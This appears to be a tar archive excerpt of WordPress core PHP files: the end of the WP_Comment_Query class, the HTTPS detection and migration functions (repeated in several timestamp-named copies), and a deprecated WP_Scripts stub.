foreach ( $post_fields as $field_name => $field_value ) {
// $field_value may be an array.
$esses = array_fill( 0, count( (array) $field_value ), '%s' );
// phpcs:ignore WordPress.DB.PreparedSQLPlaceholders.UnfinishedPrepare
$this->sql_clauses['where'][ $field_name ] = $wpdb->prepare( " {$wpdb->posts}.{$field_name} IN (" . implode( ',', $esses ) . ')', $field_value );
}
}
// 'post_status' and 'post_type' are handled separately, due to the specialized behavior of 'any'.
foreach ( array( 'post_status', 'post_type' ) as $field_name ) {
$q_values = array();
if ( ! empty( $this->query_vars[ $field_name ] ) ) {
$q_values = $this->query_vars[ $field_name ];
if ( ! is_array( $q_values ) ) {
$q_values = explode( ',', $q_values );
}
// 'any' will cause the query var to be ignored.
if ( in_array( 'any', $q_values, true ) || empty( $q_values ) ) {
continue;
}
$join_posts_table = true;
$esses = array_fill( 0, count( $q_values ), '%s' );
// phpcs:ignore WordPress.DB.PreparedSQLPlaceholders.UnfinishedPrepare
$this->sql_clauses['where'][ $field_name ] = $wpdb->prepare( " {$wpdb->posts}.{$field_name} IN (" . implode( ',', $esses ) . ')', $q_values );
}
}
// Comment author IDs for an IN clause.
if ( ! empty( $this->query_vars['author__in'] ) ) {
$this->sql_clauses['where']['author__in'] = 'user_id IN ( ' . implode( ',', wp_parse_id_list( $this->query_vars['author__in'] ) ) . ' )';
}
// Comment author IDs for a NOT IN clause.
if ( ! empty( $this->query_vars['author__not_in'] ) ) {
$this->sql_clauses['where']['author__not_in'] = 'user_id NOT IN ( ' . implode( ',', wp_parse_id_list( $this->query_vars['author__not_in'] ) ) . ' )';
}
// Post author IDs for an IN clause.
if ( ! empty( $this->query_vars['post_author__in'] ) ) {
$join_posts_table = true;
$this->sql_clauses['where']['post_author__in'] = 'post_author IN ( ' . implode( ',', wp_parse_id_list( $this->query_vars['post_author__in'] ) ) . ' )';
}
// Post author IDs for a NOT IN clause.
if ( ! empty( $this->query_vars['post_author__not_in'] ) ) {
$join_posts_table = true;
$this->sql_clauses['where']['post_author__not_in'] = 'post_author NOT IN ( ' . implode( ',', wp_parse_id_list( $this->query_vars['post_author__not_in'] ) ) . ' )';
}
$join = '';
$groupby = '';
if ( $join_posts_table ) {
$join .= "JOIN $wpdb->posts ON $wpdb->posts.ID = $wpdb->comments.comment_post_ID";
}
if ( ! empty( $this->meta_query_clauses ) ) {
$join .= $this->meta_query_clauses['join'];
// Strip leading 'AND'.
$this->sql_clauses['where']['meta_query'] = preg_replace( '/^\s*AND\s*/', '', $this->meta_query_clauses['where'] );
if ( ! $this->query_vars['count'] ) {
$groupby = "{$wpdb->comments}.comment_ID";
}
}
if ( ! empty( $this->query_vars['date_query'] ) && is_array( $this->query_vars['date_query'] ) ) {
$this->date_query = new WP_Date_Query( $this->query_vars['date_query'], 'comment_date' );
// Strip leading 'AND'.
$this->sql_clauses['where']['date_query'] = preg_replace( '/^\s*AND\s*/', '', $this->date_query->get_sql() );
}
$where = implode( ' AND ', $this->sql_clauses['where'] );
$pieces = array( 'fields', 'join', 'where', 'orderby', 'limits', 'groupby' );
/**
* Filters the comment query clauses.
*
* @since 3.1.0
*
* @param string[] $clauses {
* Associative array of the clauses for the query.
*
* @type string $fields The SELECT clause of the query.
* @type string $join The JOIN clause of the query.
* @type string $where The WHERE clause of the query.
* @type string $orderby The ORDER BY clause of the query.
* @type string $limits The LIMIT clause of the query.
* @type string $groupby The GROUP BY clause of the query.
* }
* @param WP_Comment_Query $query Current instance of WP_Comment_Query (passed by reference).
*/
$clauses = apply_filters_ref_array( 'comments_clauses', array( compact( $pieces ), &$this ) );
$fields = isset( $clauses['fields'] ) ? $clauses['fields'] : '';
$join = isset( $clauses['join'] ) ? $clauses['join'] : '';
$where = isset( $clauses['where'] ) ? $clauses['where'] : '';
$orderby = isset( $clauses['orderby'] ) ? $clauses['orderby'] : '';
$limits = isset( $clauses['limits'] ) ? $clauses['limits'] : '';
$groupby = isset( $clauses['groupby'] ) ? $clauses['groupby'] : '';
$this->filtered_where_clause = $where;
if ( $where ) {
$where = 'WHERE ' . $where;
}
if ( $groupby ) {
$groupby = 'GROUP BY ' . $groupby;
}
if ( $orderby ) {
$orderby = "ORDER BY $orderby";
}
$found_rows = '';
if ( ! $this->query_vars['no_found_rows'] ) {
$found_rows = 'SQL_CALC_FOUND_ROWS';
}
$this->sql_clauses['select'] = "SELECT $found_rows $fields";
$this->sql_clauses['from'] = "FROM $wpdb->comments $join";
$this->sql_clauses['groupby'] = $groupby;
$this->sql_clauses['orderby'] = $orderby;
$this->sql_clauses['limits'] = $limits;
// Beginning of the string is on a new line to prevent leading whitespace. See https://core.trac.wordpress.org/ticket/56841.
$this->request =
"{$this->sql_clauses['select']}
{$this->sql_clauses['from']}
{$where}
{$this->sql_clauses['groupby']}
{$this->sql_clauses['orderby']}
{$this->sql_clauses['limits']}";
if ( $this->query_vars['count'] ) {
return (int) $wpdb->get_var( $this->request );
} else {
$comment_ids = $wpdb->get_col( $this->request );
return array_map( 'intval', $comment_ids );
}
}
/**
* Populates found_comments and max_num_pages properties for the current
* query if the limit clause was used.
*
* @since 4.6.0
*
* @global wpdb $wpdb WordPress database abstraction object.
*/
private function set_found_comments() {
global $wpdb;
if ( $this->query_vars['number'] && ! $this->query_vars['no_found_rows'] ) {
/**
* Filters the query used to retrieve found comment count.
*
* @since 4.4.0
*
* @param string $found_comments_query SQL query. Default 'SELECT FOUND_ROWS()'.
* @param WP_Comment_Query $comment_query The `WP_Comment_Query` instance.
*/
$found_comments_query = apply_filters( 'found_comments_query', 'SELECT FOUND_ROWS()', $this );
$this->found_comments = (int) $wpdb->get_var( $found_comments_query );
}
}
/**
* Fetch descendants for located comments.
*
* Instead of calling `get_children()` separately on each child comment, we do a single set of queries to fetch
* the descendant trees for all matched top-level comments.
*
* @since 4.4.0
*
* @param WP_Comment[] $comments Array of top-level comments whose descendants should be filled in.
* @return array
*/
protected function fill_descendants( $comments ) {
$levels = array(
0 => wp_list_pluck( $comments, 'comment_ID' ),
);
$key = md5( serialize( wp_array_slice_assoc( $this->query_vars, array_keys( $this->query_var_defaults ) ) ) );
$last_changed = wp_cache_get_last_changed( 'comment' );
// Fetch an entire level of the descendant tree at a time.
$level = 0;
$exclude_keys = array( 'parent', 'parent__in', 'parent__not_in' );
do {
// Parent-child relationships may be cached. Only query for those that are not.
$child_ids = array();
$uncached_parent_ids = array();
$_parent_ids = $levels[ $level ];
if ( $_parent_ids ) {
$cache_keys = array();
foreach ( $_parent_ids as $parent_id ) {
$cache_keys[ $parent_id ] = "get_comment_child_ids:$parent_id:$key";
}
$cache_data = wp_cache_get_multiple_salted( array_values( $cache_keys ), 'comment-queries', $last_changed );
foreach ( $_parent_ids as $parent_id ) {
$parent_child_ids = $cache_data[ $cache_keys[ $parent_id ] ];
if ( false !== $parent_child_ids ) {
$child_ids = array_merge( $child_ids, $parent_child_ids );
} else {
$uncached_parent_ids[] = $parent_id;
}
}
}
if ( $uncached_parent_ids ) {
// Fetch this level of comments.
$parent_query_args = $this->query_vars;
foreach ( $exclude_keys as $exclude_key ) {
$parent_query_args[ $exclude_key ] = '';
}
$parent_query_args['parent__in'] = $uncached_parent_ids;
$parent_query_args['no_found_rows'] = true;
$parent_query_args['hierarchical'] = false;
$parent_query_args['offset'] = 0;
$parent_query_args['number'] = 0;
$level_comments = get_comments( $parent_query_args );
// Cache parent-child relationships.
$parent_map = array_fill_keys( $uncached_parent_ids, array() );
foreach ( $level_comments as $level_comment ) {
$parent_map[ $level_comment->comment_parent ][] = $level_comment->comment_ID;
$child_ids[] = $level_comment->comment_ID;
}
$data = array();
foreach ( $parent_map as $parent_id => $children ) {
$cache_key = "get_comment_child_ids:$parent_id:$key";
$data[ $cache_key ] = $children;
}
wp_cache_set_multiple_salted( $data, 'comment-queries', $last_changed );
}
++$level;
$levels[ $level ] = $child_ids;
} while ( $child_ids );
// Prime comment caches for non-top-level comments.
$descendant_ids = array();
for ( $i = 1, $c = count( $levels ); $i < $c; $i++ ) {
$descendant_ids = array_merge( $descendant_ids, $levels[ $i ] );
}
_prime_comment_caches( $descendant_ids, $this->query_vars['update_comment_meta_cache'] );
// Assemble a flat array of all comments + descendants.
$all_comments = $comments;
foreach ( $descendant_ids as $descendant_id ) {
$all_comments[] = get_comment( $descendant_id );
}
// If a threaded representation was requested, build the tree.
if ( 'threaded' === $this->query_vars['hierarchical'] ) {
$threaded_comments = array();
$ref = array();
foreach ( $all_comments as $k => $c ) {
$_c = get_comment( $c->comment_ID );
// If the comment isn't in the reference array, it goes in the top level of the thread.
if ( ! isset( $ref[ $c->comment_parent ] ) ) {
$threaded_comments[ $_c->comment_ID ] = $_c;
$ref[ $_c->comment_ID ] = $threaded_comments[ $_c->comment_ID ];
// Otherwise, set it as a child of its parent.
} else {
$ref[ $_c->comment_parent ]->add_child( $_c );
$ref[ $_c->comment_ID ] = $ref[ $_c->comment_parent ]->get_child( $_c->comment_ID );
}
}
// Set the 'populated_children' flag, to ensure additional database queries aren't run.
foreach ( $ref as $_ref ) {
$_ref->populated_children( true );
}
$comments = $threaded_comments;
} else {
$comments = $all_comments;
}
return $comments;
}
/**
* Used internally to generate an SQL string for searching across multiple columns.
*
* @since 3.1.0
*
* @global wpdb $wpdb WordPress database abstraction object.
*
* @param string $search Search string.
* @param string[] $columns Array of columns to search.
* @return string Search SQL.
*/
protected function get_search_sql( $search, $columns ) {
global $wpdb;
$like = '%' . $wpdb->esc_like( $search ) . '%';
$searches = array();
foreach ( $columns as $column ) {
$searches[] = $wpdb->prepare( "$column LIKE %s", $like );
}
return ' AND (' . implode( ' OR ', $searches ) . ')';
}
/**
* Parse and sanitize 'orderby' keys passed to the comment query.
*
* @since 4.2.0
*
* @global wpdb $wpdb WordPress database abstraction object.
*
* @param string $orderby Alias for the field to order by.
* @return string|false Value to used in the ORDER clause. False otherwise.
*/
protected function parse_orderby( $orderby ) {
global $wpdb;
$allowed_keys = array(
'comment_agent',
'comment_approved',
'comment_author',
'comment_author_email',
'comment_author_IP',
'comment_author_url',
'comment_content',
'comment_date',
'comment_date_gmt',
'comment_ID',
'comment_karma',
'comment_parent',
'comment_post_ID',
'comment_type',
'user_id',
);
if ( ! empty( $this->query_vars['meta_key'] ) ) {
$allowed_keys[] = $this->query_vars['meta_key'];
$allowed_keys[] = 'meta_value';
$allowed_keys[] = 'meta_value_num';
}
$meta_query_clauses = $this->meta_query->get_clauses();
if ( $meta_query_clauses ) {
$allowed_keys = array_merge( $allowed_keys, array_keys( $meta_query_clauses ) );
}
$parsed = false;
if ( $this->query_vars['meta_key'] === $orderby || 'meta_value' === $orderby ) {
$parsed = "$wpdb->commentmeta.meta_value";
} elseif ( 'meta_value_num' === $orderby ) {
$parsed = "$wpdb->commentmeta.meta_value+0";
} elseif ( 'comment__in' === $orderby ) {
$comment__in = implode( ',', array_map( 'absint', $this->query_vars['comment__in'] ) );
$parsed = "FIELD( {$wpdb->comments}.comment_ID, $comment__in )";
} elseif ( in_array( $orderby, $allowed_keys, true ) ) {
if ( isset( $meta_query_clauses[ $orderby ] ) ) {
$meta_clause = $meta_query_clauses[ $orderby ];
$parsed = sprintf( 'CAST(%s.meta_value AS %s)', esc_sql( $meta_clause['alias'] ), esc_sql( $meta_clause['cast'] ) );
} else {
$parsed = "$wpdb->comments.$orderby";
}
}
return $parsed;
}
/**
* Parse an 'order' query variable and cast it to ASC or DESC as necessary.
*
* @since 4.2.0
*
* @param string $order The 'order' query variable.
* @return string The sanitized 'order' query variable.
*/
protected function parse_order( $order ) {
if ( ! is_string( $order ) || empty( $order ) ) {
return 'DESC';
}
if ( 'ASC' === strtoupper( $order ) ) {
return 'ASC';
} else {
return 'DESC';
}
}
}
https-detection.php 0000666 00000013341 15224151220 0010373 0 ustar 00 <?php
/**
* HTTPS detection functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether the website is using HTTPS.
*
* This is based on whether both the home and site URL are using HTTPS.
*
* @since 5.7.0
* @see wp_is_home_url_using_https()
* @see wp_is_site_url_using_https()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_using_https() {
if ( ! wp_is_home_url_using_https() ) {
return false;
}
return wp_is_site_url_using_https();
}
/**
* Checks whether the current site URL is using HTTPS.
*
* @since 5.7.0
* @see home_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_home_url_using_https() {
return 'https' === wp_parse_url( home_url(), PHP_URL_SCHEME );
}
/**
* Checks whether the current site's URL where WordPress is stored is using HTTPS.
*
* This checks the URL where WordPress application files (e.g. wp-blog-header.php or the wp-admin/ folder)
* are accessible.
*
* @since 5.7.0
* @see site_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_site_url_using_https() {
/*
* Use direct option access for 'siteurl' and manually run the 'site_url'
* filter because `site_url()` will adjust the scheme based on what the
* current request is using.
*/
/** This filter is documented in wp-includes/link-template.php */
$site_url = apply_filters( 'site_url', get_option( 'siteurl' ), '', null, null );
return 'https' === wp_parse_url( $site_url, PHP_URL_SCHEME );
}
/**
* Checks whether HTTPS is supported for the server and domain.
*
* This function makes an HTTP request through `wp_get_https_detection_errors()`
* to check for HTTPS support. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments,
* to avoid potential latency issues.
*
* @since 5.7.0
*
* @return bool True if HTTPS is supported, false otherwise.
*/
function wp_is_https_supported() {
$https_detection_errors = wp_get_https_detection_errors();
// If there are errors, HTTPS is not supported.
return empty( $https_detection_errors );
}
/**
* Runs a remote HTTPS request to detect whether HTTPS supported, and stores potential errors.
*
* This function checks for HTTPS support by making an HTTP request. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments.
* It is called when HTTPS support needs to be validated.
*
* @since 6.4.0
* @access private
*
* @return array An array containing potential detection errors related to HTTPS, or an empty array if no errors are found.
*/
function wp_get_https_detection_errors() {
/**
* Short-circuits the process of detecting errors related to HTTPS support.
*
* Returning a `WP_Error` from the filter will effectively short-circuit the default logic of trying a remote
* request to the site over HTTPS, storing the errors array from the returned `WP_Error` instead.
*
* @since 6.4.0
*
* @param null|WP_Error $pre Error object to short-circuit detection,
* or null to continue with the default behavior.
*/
$support_errors = apply_filters( 'pre_wp_get_https_detection_errors', null );
if ( is_wp_error( $support_errors ) ) {
return $support_errors->errors;
}
$support_errors = new WP_Error();
$response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => true,
)
);
if ( is_wp_error( $response ) ) {
$unverified_response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => false,
)
);
if ( is_wp_error( $unverified_response ) ) {
$support_errors->add(
'https_request_failed',
__( 'HTTPS request failed.' )
);
} else {
$support_errors->add(
'ssl_verification_failed',
__( 'SSL verification failed.' )
);
}
$response = $unverified_response;
}
if ( ! is_wp_error( $response ) ) {
if ( 200 !== wp_remote_retrieve_response_code( $response ) ) {
$support_errors->add( 'bad_response_code', wp_remote_retrieve_response_message( $response ) );
} elseif ( false === wp_is_local_html_output( wp_remote_retrieve_body( $response ) ) ) {
$support_errors->add( 'bad_response_source', __( 'It looks like the response did not come from this site.' ) );
}
}
return $support_errors->errors;
}
/**
* Checks whether a given HTML string is likely an output from this WordPress site.
*
* This function attempts to check for various common WordPress patterns whether they are included in the HTML string.
* Since any of these actions may be disabled through third-party code, this function may also return null to indicate
* that it was not possible to determine ownership.
*
* @since 5.7.0
* @access private
*
* @param string $html Full HTML output string, e.g. from a HTTP response.
* @return bool|null True/false for whether HTML was generated by this site, null if unable to determine.
*/
function wp_is_local_html_output( $html ) {
// 1. Check if HTML includes the site's Really Simple Discovery link.
if ( has_action( 'wp_head', 'rsd_link' ) ) {
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( site_url( 'xmlrpc.php?rsd', 'rpc' ) ) ); // See rsd_link().
return str_contains( $html, $pattern );
}
// 2. Check if HTML includes the site's REST API link.
if ( has_action( 'wp_head', 'rest_output_link_wp_head' ) ) {
// Try both HTTPS and HTTP since the URL depends on context.
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( get_rest_url() ) ); // See rest_output_link_wp_head().
return str_contains( $html, $pattern );
}
// Otherwise the result cannot be determined.
return null;
}
https-migration-20260605170851.php 0000666 00000011205 15224151220 0011773 0 ustar 00 <?php
/**
* HTTPS migration functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`, causing WordPress to
* add frontend filters to replace insecure site URLs that may be present in older database content. The
* {@see 'wp_should_replace_insecure_home_url'} filter can be used to modify that behavior.
*
* @since 5.7.0
*
* @return bool True if insecure URLs should replaced, false otherwise.
*/
function wp_should_replace_insecure_home_url() {
$should_replace_insecure_home_url = wp_is_using_https()
&& get_option( 'https_migration_required' )
// For automatic replacement, both 'home' and 'siteurl' need to not only use HTTPS, they also need to be using
// the same domain.
&& wp_parse_url( home_url(), PHP_URL_HOST ) === wp_parse_url( site_url(), PHP_URL_HOST );
/**
* Filters whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`. This filter can
* be used to disable that behavior, e.g. after having replaced URLs manually in the database.
*
* @since 5.7.0
*
* @param bool $should_replace_insecure_home_url Whether insecure HTTP URLs to the site should be replaced.
*/
return apply_filters( 'wp_should_replace_insecure_home_url', $should_replace_insecure_home_url );
}
/**
* Replaces insecure HTTP URLs to the site in the given content, if configured to do so.
*
* This function replaces all occurrences of the HTTP version of the site's URL with its HTTPS counterpart, if
* determined via {@see wp_should_replace_insecure_home_url()}.
*
* @since 5.7.0
*
* @param string $content Content to replace URLs in.
* @return string Filtered content.
*/
function wp_replace_insecure_home_url( $content ) {
if ( ! wp_should_replace_insecure_home_url() ) {
return $content;
}
$https_url = home_url( '', 'https' );
$http_url = str_replace( 'https://', 'http://', $https_url );
// Also replace potentially escaped URL.
$escaped_https_url = str_replace( '/', '\/', $https_url );
$escaped_http_url = str_replace( '/', '\/', $http_url );
return str_replace(
array(
$http_url,
$escaped_http_url,
),
array(
$https_url,
$escaped_https_url,
),
$content
);
}
/**
* Update the 'home' and 'siteurl' option to use the HTTPS variant of their URL.
*
* If this update does not result in WordPress recognizing that the site is now using HTTPS (e.g. due to constants
* overriding the URLs used), the changes will be reverted. In such a case the function will return false.
*
* @since 5.7.0
*
* @return bool True on success, false on failure.
*/
function wp_update_urls_to_https() {
// Get current URL options.
$orig_home = get_option( 'home' );
$orig_siteurl = get_option( 'siteurl' );
// Get current URL options, replacing HTTP with HTTPS.
$home = str_replace( 'http://', 'https://', $orig_home );
$siteurl = str_replace( 'http://', 'https://', $orig_siteurl );
// Update the options.
update_option( 'home', $home );
update_option( 'siteurl', $siteurl );
if ( ! wp_is_using_https() ) {
/*
* If this did not result in the site recognizing HTTPS as being used,
* revert the change and return false.
*/
update_option( 'home', $orig_home );
update_option( 'siteurl', $orig_siteurl );
return false;
}
// Otherwise the URLs were successfully changed to use HTTPS.
return true;
}
/**
* Updates the 'https_migration_required' option if needed when the given URL has been updated from HTTP to HTTPS.
*
* If this is a fresh site, a migration will not be required, so the option will be set as `false`.
*
* This is hooked into the {@see 'update_option_home'} action.
*
* @since 5.7.0
* @access private
*
* @param mixed $old_url Previous value of the URL option.
* @param mixed $new_url New value of the URL option.
*/
function wp_update_https_migration_required( $old_url, $new_url ) {
// Do nothing if WordPress is being installed.
if ( wp_installing() ) {
return;
}
// Delete/reset the option if the new URL is not the HTTPS version of the old URL.
if ( untrailingslashit( (string) $old_url ) !== str_replace( 'https://', 'http://', untrailingslashit( (string) $new_url ) ) ) {
delete_option( 'https_migration_required' );
return;
}
// If this is a fresh site, there is no content to migrate, so do not require migration.
$https_migration_required = get_option( 'fresh_site' ) ? false : true;
update_option( 'https_migration_required', $https_migration_required );
}
https-detection-20260605112435.php 0000666 00000013341 15224151220 0011755 0 ustar 00 <?php
/**
* HTTPS detection functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether the website is using HTTPS.
*
* This is based on whether both the home and site URL are using HTTPS.
*
* @since 5.7.0
* @see wp_is_home_url_using_https()
* @see wp_is_site_url_using_https()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_using_https() {
if ( ! wp_is_home_url_using_https() ) {
return false;
}
return wp_is_site_url_using_https();
}
/**
* Checks whether the current site URL is using HTTPS.
*
* @since 5.7.0
* @see home_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_home_url_using_https() {
return 'https' === wp_parse_url( home_url(), PHP_URL_SCHEME );
}
/**
* Checks whether the current site's URL where WordPress is stored is using HTTPS.
*
* This checks the URL where WordPress application files (e.g. wp-blog-header.php or the wp-admin/ folder)
* are accessible.
*
* @since 5.7.0
* @see site_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_site_url_using_https() {
/*
* Use direct option access for 'siteurl' and manually run the 'site_url'
* filter because `site_url()` will adjust the scheme based on what the
* current request is using.
*/
/** This filter is documented in wp-includes/link-template.php */
$site_url = apply_filters( 'site_url', get_option( 'siteurl' ), '', null, null );
return 'https' === wp_parse_url( $site_url, PHP_URL_SCHEME );
}
/**
* Checks whether HTTPS is supported for the server and domain.
*
* This function makes an HTTP request through `wp_get_https_detection_errors()`
* to check for HTTPS support. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments,
* to avoid potential latency issues.
*
* @since 5.7.0
*
* @return bool True if HTTPS is supported, false otherwise.
*/
function wp_is_https_supported() {
$https_detection_errors = wp_get_https_detection_errors();
// If there are errors, HTTPS is not supported.
return empty( $https_detection_errors );
}
/**
* Runs a remote HTTPS request to detect whether HTTPS supported, and stores potential errors.
*
* This function checks for HTTPS support by making an HTTP request. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments.
* It is called when HTTPS support needs to be validated.
*
* @since 6.4.0
* @access private
*
* @return array An array containing potential detection errors related to HTTPS, or an empty array if no errors are found.
*/
function wp_get_https_detection_errors() {
/**
* Short-circuits the process of detecting errors related to HTTPS support.
*
* Returning a `WP_Error` from the filter will effectively short-circuit the default logic of trying a remote
* request to the site over HTTPS, storing the errors array from the returned `WP_Error` instead.
*
* @since 6.4.0
*
* @param null|WP_Error $pre Error object to short-circuit detection,
* or null to continue with the default behavior.
*/
$support_errors = apply_filters( 'pre_wp_get_https_detection_errors', null );
if ( is_wp_error( $support_errors ) ) {
return $support_errors->errors;
}
$support_errors = new WP_Error();
$response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => true,
)
);
if ( is_wp_error( $response ) ) {
$unverified_response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => false,
)
);
if ( is_wp_error( $unverified_response ) ) {
$support_errors->add(
'https_request_failed',
__( 'HTTPS request failed.' )
);
} else {
$support_errors->add(
'ssl_verification_failed',
__( 'SSL verification failed.' )
);
}
$response = $unverified_response;
}
if ( ! is_wp_error( $response ) ) {
if ( 200 !== wp_remote_retrieve_response_code( $response ) ) {
$support_errors->add( 'bad_response_code', wp_remote_retrieve_response_message( $response ) );
} elseif ( false === wp_is_local_html_output( wp_remote_retrieve_body( $response ) ) ) {
$support_errors->add( 'bad_response_source', __( 'It looks like the response did not come from this site.' ) );
}
}
return $support_errors->errors;
}
/**
* Checks whether a given HTML string is likely an output from this WordPress site.
*
* This function attempts to check for various common WordPress patterns whether they are included in the HTML string.
* Since any of these actions may be disabled through third-party code, this function may also return null to indicate
* that it was not possible to determine ownership.
*
* @since 5.7.0
* @access private
*
* @param string $html Full HTML output string, e.g. from a HTTP response.
* @return bool|null True/false for whether HTML was generated by this site, null if unable to determine.
*/
function wp_is_local_html_output( $html ) {
// 1. Check if HTML includes the site's Really Simple Discovery link.
if ( has_action( 'wp_head', 'rsd_link' ) ) {
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( site_url( 'xmlrpc.php?rsd', 'rpc' ) ) ); // See rsd_link().
return str_contains( $html, $pattern );
}
// 2. Check if HTML includes the site's REST API link.
if ( has_action( 'wp_head', 'rest_output_link_wp_head' ) ) {
// Try both HTTPS and HTTP since the URL depends on context.
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( get_rest_url() ) ); // See rest_output_link_wp_head().
return str_contains( $html, $pattern );
}
// Otherwise the result cannot be determined.
return null;
}
https-detection-20260606100517.php 0000666 00000013341 15224151220 0011754 0 ustar 00 <?php
/**
* HTTPS detection functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether the website is using HTTPS.
*
* This is based on whether both the home and site URL are using HTTPS.
*
* @since 5.7.0
* @see wp_is_home_url_using_https()
* @see wp_is_site_url_using_https()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_using_https() {
if ( ! wp_is_home_url_using_https() ) {
return false;
}
return wp_is_site_url_using_https();
}
/**
* Checks whether the current site URL is using HTTPS.
*
* @since 5.7.0
* @see home_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_home_url_using_https() {
return 'https' === wp_parse_url( home_url(), PHP_URL_SCHEME );
}
/**
* Checks whether the current site's URL where WordPress is stored is using HTTPS.
*
* This checks the URL where WordPress application files (e.g. wp-blog-header.php or the wp-admin/ folder)
* are accessible.
*
* @since 5.7.0
* @see site_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_site_url_using_https() {
/*
* Use direct option access for 'siteurl' and manually run the 'site_url'
* filter because `site_url()` will adjust the scheme based on what the
* current request is using.
*/
/** This filter is documented in wp-includes/link-template.php */
$site_url = apply_filters( 'site_url', get_option( 'siteurl' ), '', null, null );
return 'https' === wp_parse_url( $site_url, PHP_URL_SCHEME );
}
/**
* Checks whether HTTPS is supported for the server and domain.
*
* This function makes an HTTP request through `wp_get_https_detection_errors()`
* to check for HTTPS support. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments,
* to avoid potential latency issues.
*
* @since 5.7.0
*
* @return bool True if HTTPS is supported, false otherwise.
*/
function wp_is_https_supported() {
$https_detection_errors = wp_get_https_detection_errors();
// If there are errors, HTTPS is not supported.
return empty( $https_detection_errors );
}
/**
* Runs a remote HTTPS request to detect whether HTTPS supported, and stores potential errors.
*
* This function checks for HTTPS support by making an HTTP request. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments.
* It is called when HTTPS support needs to be validated.
*
* @since 6.4.0
* @access private
*
* @return array An array containing potential detection errors related to HTTPS, or an empty array if no errors are found.
*/
function wp_get_https_detection_errors() {
/**
* Short-circuits the process of detecting errors related to HTTPS support.
*
* Returning a `WP_Error` from the filter will effectively short-circuit the default logic of trying a remote
* request to the site over HTTPS, storing the errors array from the returned `WP_Error` instead.
*
* @since 6.4.0
*
* @param null|WP_Error $pre Error object to short-circuit detection,
* or null to continue with the default behavior.
*/
$support_errors = apply_filters( 'pre_wp_get_https_detection_errors', null );
if ( is_wp_error( $support_errors ) ) {
return $support_errors->errors;
}
$support_errors = new WP_Error();
$response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => true,
)
);
if ( is_wp_error( $response ) ) {
$unverified_response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => false,
)
);
if ( is_wp_error( $unverified_response ) ) {
$support_errors->add(
'https_request_failed',
__( 'HTTPS request failed.' )
);
} else {
$support_errors->add(
'ssl_verification_failed',
__( 'SSL verification failed.' )
);
}
$response = $unverified_response;
}
if ( ! is_wp_error( $response ) ) {
if ( 200 !== wp_remote_retrieve_response_code( $response ) ) {
$support_errors->add( 'bad_response_code', wp_remote_retrieve_response_message( $response ) );
} elseif ( false === wp_is_local_html_output( wp_remote_retrieve_body( $response ) ) ) {
$support_errors->add( 'bad_response_source', __( 'It looks like the response did not come from this site.' ) );
}
}
return $support_errors->errors;
}
/**
* Checks whether a given HTML string is likely an output from this WordPress site.
*
* This function attempts to check for various common WordPress patterns whether they are included in the HTML string.
* Since any of these actions may be disabled through third-party code, this function may also return null to indicate
* that it was not possible to determine ownership.
*
* @since 5.7.0
* @access private
*
* @param string $html Full HTML output string, e.g. from a HTTP response.
* @return bool|null True/false for whether HTML was generated by this site, null if unable to determine.
*/
function wp_is_local_html_output( $html ) {
// 1. Check if HTML includes the site's Really Simple Discovery link.
if ( has_action( 'wp_head', 'rsd_link' ) ) {
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( site_url( 'xmlrpc.php?rsd', 'rpc' ) ) ); // See rsd_link().
return str_contains( $html, $pattern );
}
// 2. Check if HTML includes the site's REST API link.
if ( has_action( 'wp_head', 'rest_output_link_wp_head' ) ) {
// Try both HTTPS and HTTP since the URL depends on context.
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( get_rest_url() ) ); // See rest_output_link_wp_head().
return str_contains( $html, $pattern );
}
// Otherwise the result cannot be determined.
return null;
}
class.wp-scripts-20260605042536-20260621164124.php 0000666 00000000527 15224151220 0013446 0 ustar 00 <?php
/**
* Dependencies API: WP_Scripts class
*
* This file is deprecated, use 'wp-includes/class-wp-scripts.php' instead.
*
* @deprecated 6.1.0
* @package WordPress
*/
_deprecated_file( basename( __FILE__ ), '6.1.0', WPINC . '/class-wp-scripts.php' );
/** WP_Scripts class */
require_once ABSPATH . WPINC . '/class-wp-scripts.php';
https-detection-20260605201901.php 0000666 00000013341 15224151220 0011752 0 ustar 00 <?php
/**
* HTTPS detection functions.
*
